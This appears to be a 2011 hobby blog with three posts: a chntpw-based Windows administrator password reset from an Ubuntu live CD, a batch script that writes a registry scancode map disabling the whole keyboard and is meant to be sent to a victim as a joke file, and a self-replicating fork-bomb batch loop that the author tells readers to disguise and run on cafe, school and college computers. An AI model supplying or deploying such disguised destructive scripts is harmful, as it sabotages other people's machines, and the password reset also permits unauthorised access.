Monday, August 29, 2011

Recover Windows 7 password with Ubuntu Linux

Resetting Windows Administrator Password Using Linux: In case you or a friend of yours has forgotten his/her Windows administrator password, or in rare case your password management software screws up, there’s no need to panic as you can easily reset the password provided you have the right tools. One way to do this is to use Linux as your knight in shining armor.

I’m going to show you how you can smoothly reset a Windows Administrator password using Linux. You will only need a Live CD, and for this example, we will utilize Ubuntu. Also, I assume that you have the basic knowledge on using the Linux command line.

Now let’s get started:

The first thing you have to do is of course load your Ubuntu Live CD. You don’t have to install it, just boot straight into the desktop. Then, install a program called ‘chntpw’:

$ sudo apt-get install chntpw

After successfully installing ‘chntpw’, you have to access the Windows NTFS partition by mounting it and allowing read/write support. A good tutorial on how to do this can be found HERE.

After that, use your command line skills by navigating to ‘WINDOWS/system32/config’.

Once inside the ‘config’ directory, issue this command:

$ sudo chntpw SAM

A long display of information will follow. Just ignore them.

Once you are prompted to reset the password, it is recommended to leave the password blank with an asterisk *. Reboot, and you can now login to freakin’ Windows.

Wednesday, August 24, 2011


CRASH KEYBOARD OF ANY COMPUTER :
hi, today i'm going to tell you about how a hacker can smash you key board with batch file programing i got this code from Google . so lets see how ? so first of all , a hacker will create this bat file with below coding (this is the example of a coding):


REM DISABLING OF KEYBOARD
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg

now the hacker will save this coding on notepad as anything.bat or cricket.bat or may be jokes.bat
and he will send this file to his victim . so when this kind of poor guy (his victim) will open the batch file will run and infects the registry of key board so , his key board will be blocked . it will not work !
& he must have to format his C drive (default windows OS location ) ! so ignore this kind of bat file to protect you computer . before you run any batch file just open it on notepad and read the source coding then move on....
so that's how a hacker (or you can say any idiot ) can Harm you Key board !!
So Protect .. Your Poor Box :)

Sunday, August 21, 2011

simply crash any computer with following batch file

write the following code in notepad and then follow the below instructions
@echo off
:d
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start firefox
start firefox

start firefox
start firefox

start firefox

start firefox
start firefox

start firefox

start firefox
start cricket.bat

start cricket.bat

start cricket.bat

start cricket.bat

start cricket.bat

start cricket.bat

start cricket.bat

goto d

okay so here is a loop save this file as cricket.bat and change the icon of this file as a different from it's properties settings.by executing this command will hang your computer mouse and the hole the system and after few seconds the system will be crash ! don't try this virus at your home use this at cafe or schools,colleges etc
so enjoy.......